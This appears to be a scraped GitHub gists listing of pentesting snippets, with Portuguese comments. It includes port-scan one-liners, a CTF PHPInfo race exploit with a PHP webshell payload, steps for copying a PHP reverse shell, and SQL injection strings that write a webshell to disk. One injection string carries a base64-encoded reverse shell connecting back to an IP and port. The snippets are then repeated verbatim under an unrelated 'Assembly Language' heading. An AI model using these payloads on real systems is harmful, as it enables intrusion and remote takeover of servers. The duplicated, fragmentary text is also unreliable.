Diego Albuquerque diegoalbuquerque

## get_ippsec_details.py
#!/usr/bin/env python3
"""
Script used to pull down the current video descriptions from ippsec's youtube channel.
The raw output still has a few HTML tags that need to be manually removed and there
also seem to be multiple duplicates of videos that have been removed in the output
saved as ippsec-details.txt
"""
import re
import sys

## fastscan
#NMAP
nmap -T5 --host-timeout 4s --min-rate 1000 -PN -n -p <PORTAS>  <SERVER>

#NETCAT
for i in {1..2000}; do nc -vz <SERVER> $i 2>&1 | grep -vi "failed"; done

## infosec-tools.txt
Security Tool List
├───AD
│   ├───ACLPwn
│   ├───ACL_PWN
│   ├───ADAPE
│   ├───ADAudit
│   ├───ADCollector
│   ├───ADpwn
│   ├───ADRecon
│   ├───ADReconPowershell

## phpinfo_exploit.py
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

## passwords.txt payload content
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>

import sys,Queue,threading,hashlib,os, requests,  pickle, os.path, re
from subprocess import Popen, PIPE, STDOUT

## SimpleHTTPServerWithUpload.py
#!/usr/bin/env python3

"""Simple HTTP Server With Upload.

This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.

see: https://gist.github.com/UniIsland/3346170
"""


## web-shell.sh
root@kbca# locate webshell | grep revers
/usr/share/webshells/jsp/jsp-reverse.jsp
/usr/share/webshells/perl/perl-reverse-shell.pl
/usr/share/webshells/php/php-reverse-shell.php

root@kbca# cp /usr/share/webshells/php/php-reverse-shell.php meu-lindo-shell.php

# >>>> Precisamos Substituir o IP e Porta <<<<
root@kbca# grep -i "CHANGE THIS" meu-lindo-shell.php
$ip = '127.0.0.1';  // CHANGE THIS

## code-injection1.sql
myusername=john&mypassword=-9334' OR 1908=1908 LIMIT 0,1 INTO OUTFILE
'/var/www/meu-lindo-shell.php' LINES TERMINATED BY
0x3c3f7068 (... todo o hexa aqui ...)-- -

## eval_base64decode.php
<?php eval(base64_decode('<codigo em base64')); ?>

## gist:d43f583036ef8862b25064e2f05b31af
myusername=john&mypassword=-9334' OR 1908=1908 limit 0,0 union all select "<?php eval(base64_decode(",”'c2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4yMDAuMyc7ICAvLyBDSEFOR0UgVEhJUwokcG9ydCA9IDQ0MzsgICAgICAgLy8gQ0hBTkdFIFRISVMKJGNodW5rX3NpemUgPSAxNDAwOwokd3JpdGVfYSA9IG51bGw7CiRlcnJvcl9hID0gbnVsbDsKJHNoZWxsID0gJ3VuYW1lIC1hOyB3OyBpZDsgL2Jpbi9zaCAtaSc7CiRkYWVtb24gPSAwOwokZGVidWcgPSAwOwoKCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwoJfQoKCWlmIChwb3NpeF9zZXRzaWQoKSA9PSAtMSkgewoJCXByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOwoJCWV4aXQoMSk7Cgl9CgoJJGRhZW1vbiA9IDE7Cn0gZWxzZSB7CglwcmludGl0KCJXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiAgVGhpcyBpcyBxdWl0ZSBjb21tb24gYW5kIG5vdCBmYXRhbC4iKTsKfQoKY2hkaXIoIi8iKTsKCnVtYXNrKDApOwoKCiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwppZiAoISRzb2NrKSB7CglwcmludGl0

## resources.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                diegoalbuquerque
                / resources.md
            
            
              Created
              August 7, 2020 10:50
                — forked from muff-in/resources.md
            
          
    Assembly Language / Reversing / Malware Analysis -resources


⭐Assembly Language
	#!/usr/bin/env python3
	"""
	Script used to pull down the current video descriptions from ippsec's youtube channel.
	The raw output still has a few HTML tags that need to be manually removed and there
	also seem to be multiple duplicates of videos that have been removed in the output
	saved as ippsec-details.txt
	"""
	import re
	import sys
	#NMAP
	nmap -T5 --host-timeout 4s --min-rate 1000 -PN -n -p <PORTAS> <SERVER>

	#NETCAT
	for i in {1..2000}; do nc -vz <SERVER> $i 2>&1 \| grep -vi "failed"; done
	Security Tool List
	├───AD
	│ ├───ACLPwn
	│ ├───ACL_PWN
	│ ├───ADAPE
	│ ├───ADAudit
	│ ├───ADCollector
	│ ├───ADpwn
	│ ├───ADRecon
	│ ├───ADReconPowershell
	## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
	# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	## passwords.txt payload content
	# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>

	import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re
	from subprocess import Popen, PIPE, STDOUT
	#!/usr/bin/env python3

	"""Simple HTTP Server With Upload.

	This module builds on BaseHTTPServer by implementing the standard GET
	and HEAD requests in a fairly straightforward manner.

	see: https://gist.github.com/UniIsland/3346170
	"""
	root@kbca# locate webshell \| grep revers
	/usr/share/webshells/jsp/jsp-reverse.jsp
	/usr/share/webshells/perl/perl-reverse-shell.pl
	/usr/share/webshells/php/php-reverse-shell.php

	root@kbca# cp /usr/share/webshells/php/php-reverse-shell.php meu-lindo-shell.php

	# >>>> Precisamos Substituir o IP e Porta <<<<
	root@kbca# grep -i "CHANGE THIS" meu-lindo-shell.php
	$ip = '127.0.0.1'; // CHANGE THIS
	myusername=john&mypassword=-9334' OR 1908=1908 LIMIT 0,1 INTO OUTFILE
	'/var/www/meu-lindo-shell.php' LINES TERMINATED BY
	0x3c3f7068 (... todo o hexa aqui ...)-- -